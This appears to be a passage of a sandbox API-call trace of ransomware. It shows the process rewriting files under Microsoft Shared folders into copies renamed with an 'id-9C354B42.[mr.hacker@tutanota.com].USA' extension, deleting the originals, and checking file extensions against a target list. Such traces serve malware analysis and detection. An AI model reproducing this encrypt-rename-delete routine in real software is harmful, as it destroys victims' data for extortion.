[0055.200] CloseHandle (hObject=0x248) returned 1 [0055.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt")) returned 0x20 [0055.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0055.200] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0055.201] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.201] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.201] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.202] GetLastError () returned 0x0 [0055.202] ReadFile (in: hFile=0x248, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x44780, lpOverlapped=0x0) returned 1 [0055.209] WriteFile (in: hFile=0x21c, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x44790, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x44790, lpOverlapped=0x0) returned 1 [0055.214] ReadFile (in: hFile=0x248, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.214] WriteFile (in: hFile=0x21c, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.214] SetEndOfFile (hFile=0x21c) returned 1 [0055.214] CloseHandle (hObject=0x21c) returned 1 [0055.214] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.214] SetEndOfFile (hFile=0x248) returned 1 [0055.217] CloseHandle (hObject=0x248) returned 1 [0055.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0055.217] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt")) returned 1 [0055.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0055.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0055.217] lstrlenW (lpString=".doc") returned 4 [0055.217] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0055.217] lstrlenW (lpString=".docx") returned 5 [0055.217] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0055.217] lstrlenW (lpString=".pdf") returned 4 [0055.217] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0055.217] lstrlenW (lpString=".xls") returned 4 [0055.217] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0055.217] lstrlenW (lpString=".xlsx") returned 5 [0055.217] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0055.217] lstrlenW (lpString=".ppt") returned 4 [0055.217] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0055.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0055.218] lstrlenW (lpString=".zip") returned 4 [0055.218] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0055.218] lstrlenW (lpString=".rar") returned 4 [0055.218] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0055.218] lstrlenW (lpString=".bz2") returned 4 [0055.218] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0055.218] lstrlenW (lpString=".7z") returned 3 [0055.218] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0055.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0055.218] lstrlenW (lpString=".dbf") returned 4 [0055.218] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0055.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0055.218] lstrlenW (lpString=".1cd") returned 4 [0055.218] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0055.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0055.218] lstrlenW (lpString=".jpg") returned 4 [0055.218] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0055.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0055.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0055.218] lstrlenW (lpString=".doc") returned 4 [0055.218] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0055.218] lstrlenW (lpString=".docx") returned 5 [0055.218] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0055.218] lstrlenW (lpString=".pdf") returned 4 [0055.218] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0055.218] lstrlenW (lpString=".xls") returned 4 [0055.218] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0055.218] lstrlenW (lpString=".xlsx") returned 5 [0055.218] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0055.218] lstrlenW (lpString=".ppt") returned 4 [0055.218] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0055.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0055.219] lstrlenW (lpString=".zip") returned 4 [0055.219] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0055.219] lstrlenW (lpString=".rar") returned 4 [0055.219] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0055.219] lstrlenW (lpString=".bz2") returned 4 [0055.219] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0055.219] lstrlenW (lpString=".7z") returned 3 [0055.219] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0055.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0055.219] lstrlenW (lpString=".dbf") returned 4 [0055.219] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0055.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0055.219] lstrlenW (lpString=".1cd") returned 4 [0055.219] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0055.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0055.219] lstrlenW (lpString=".jpg") returned 4 [0055.219] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0055.219] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0055.219] lstrlenW (lpString="hxds.dll") returned 8 [0055.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0057.168] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=1257984) returned 1 [0057.168] CloseHandle (hObject=0x210) returned 1 [0057.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll")) returned 0x20 [0057.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.169] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0057.169] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.169] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.169] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0057.169] GetLastError () returned 0x0 [0057.169] ReadFile (in: hFile=0x210, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0057.194] WriteFile (in: hFile=0x220, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0057.474] ReadFile (in: hFile=0x210, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x33210, lpOverlapped=0x0) returned 1 [0057.485] WriteFile (in: hFile=0x220, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x33220, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x33220, lpOverlapped=0x0) returned 1 [0057.492] ReadFile (in: hFile=0x210, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.492] WriteFile (in: hFile=0x220, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0057.492] SetEndOfFile (hFile=0x220) returned 1 [0057.492] CloseHandle (hObject=0x220) returned 1 [0057.493] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.493] SetEndOfFile (hFile=0x210) returned 1 [0057.495] CloseHandle (hObject=0x210) returned 1 [0057.495] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.495] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll")) returned 1 [0057.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0057.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0057.495] lstrlenW (lpString=".doc") returned 4 [0057.495] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0057.495] lstrlenW (lpString=".docx") returned 5 [0057.495] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0057.495] lstrlenW (lpString=".pdf") returned 4 [0057.495] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0057.495] lstrlenW (lpString=".xls") returned 4 [0057.495] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0057.495] lstrlenW (lpString=".xlsx") returned 5 [0057.495] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0057.495] lstrlenW (lpString=".ppt") returned 4 [0057.495] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0057.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0057.496] lstrlenW (lpString=".zip") returned 4 [0057.496] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0057.496] lstrlenW (lpString=".rar") returned 4 [0057.496] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0057.496] lstrlenW (lpString=".bz2") returned 4 [0057.496] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0057.496] lstrlenW (lpString=".7z") returned 3 [0057.496] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0057.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0057.496] lstrlenW (lpString=".dbf") returned 4 [0057.496] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0057.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0057.496] lstrlenW (lpString=".1cd") returned 4 [0057.496] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0057.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0057.496] lstrlenW (lpString=".jpg") returned 4 [0057.496] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0057.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0057.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0057.496] lstrlenW (lpString=".doc") returned 4 [0057.496] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0057.496] lstrlenW (lpString=".docx") returned 5 [0057.496] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0057.496] lstrlenW (lpString=".pdf") returned 4 [0057.496] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0057.496] lstrlenW (lpString=".xls") returned 4 [0057.496] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0057.496] lstrlenW (lpString=".xlsx") returned 5 [0057.496] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0057.496] lstrlenW (lpString=".ppt") returned 4 [0057.496] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0057.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0057.497] lstrlenW (lpString=".zip") returned 4 [0057.497] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0057.497] lstrlenW (lpString=".rar") returned 4 [0057.497] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0057.497] lstrlenW (lpString=".bz2") returned 4 [0057.497] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0057.497] lstrlenW (lpString=".7z") returned 3 [0057.497] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0057.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0057.497] lstrlenW (lpString=".dbf") returned 4 [0057.497] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0057.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0057.497] lstrlenW (lpString=".1cd") returned 4 [0057.497] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0057.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0057.497] lstrlenW (lpString=".jpg") returned 4 [0057.497] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0057.497] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0057.497] lstrlenW (lpString="ACERECR.DLL") returned 11 [0057.497] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0057.766] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=20944) returned 1 [0057.767] CloseHandle (hObject=0x240) returned 1 [0057.767] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll")) returned 0x20 [0057.767] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.767] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0057.767] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.767] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.767] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0057.767] GetLastError () returned 0x0 [0057.767] ReadFile (in: hFile=0x240, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x51d0, lpOverlapped=0x0) returned 1 [0057.769] WriteFile (in: hFile=0x1f0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x51e0, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x51e0, lpOverlapped=0x0) returned 1 [0057.770] ReadFile (in: hFile=0x240, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.771] WriteFile (in: hFile=0x1f0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xea, lpOverlapped=0x0) returned 1 [0057.771] SetEndOfFile (hFile=0x1f0) returned 1 [0057.771] CloseHandle (hObject=0x1f0) returned 1 [0057.771] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.771] SetEndOfFile (hFile=0x240) returned 1 [0057.772] CloseHandle (hObject=0x240) returned 1 [0057.772] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.772] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll")) returned 1 [0057.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0057.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0057.772] lstrlenW (lpString=".doc") returned 4 [0057.772] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.772] lstrlenW (lpString=".docx") returned 5 [0057.772] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0057.772] lstrlenW (lpString=".pdf") returned 4 [0057.772] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.772] lstrlenW (lpString=".xls") returned 4 [0057.773] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.773] lstrlenW (lpString=".xlsx") returned 5 [0057.773] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0057.773] lstrlenW (lpString=".ppt") returned 4 [0057.773] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0057.773] lstrlenW (lpString=".zip") returned 4 [0057.773] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.773] lstrlenW (lpString=".rar") returned 4 [0057.773] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.773] lstrlenW (lpString=".bz2") returned 4 [0057.773] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.773] lstrlenW (lpString=".7z") returned 3 [0057.773] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0057.773] lstrlenW (lpString=".dbf") returned 4 [0057.773] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0057.773] lstrlenW (lpString=".1cd") returned 4 [0057.773] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0057.773] lstrlenW (lpString=".jpg") returned 4 [0057.773] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0057.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0057.773] lstrlenW (lpString=".doc") returned 4 [0057.773] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.773] lstrlenW (lpString=".docx") returned 5 [0057.773] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0057.773] lstrlenW (lpString=".pdf") returned 4 [0057.773] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.773] lstrlenW (lpString=".xls") returned 4 [0057.774] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.774] lstrlenW (lpString=".xlsx") returned 5 [0057.774] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0057.774] lstrlenW (lpString=".ppt") returned 4 [0057.774] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0057.774] lstrlenW (lpString=".zip") returned 4 [0057.774] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.774] lstrlenW (lpString=".rar") returned 4 [0057.774] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.774] lstrlenW (lpString=".bz2") returned 4 [0057.774] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.774] lstrlenW (lpString=".7z") returned 3 [0057.774] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0057.774] lstrlenW (lpString=".dbf") returned 4 [0057.774] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0057.774] lstrlenW (lpString=".1cd") returned 4 [0057.774] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0057.774] lstrlenW (lpString=".jpg") returned 4 [0057.774] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.774] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0057.774] lstrlenW (lpString="ALRTINTL.DLL") returned 12 [0057.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0057.775] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=154448) returned 1 [0057.775] CloseHandle (hObject=0x240) returned 1 [0057.775] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll")) returned 0x20 [0057.775] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 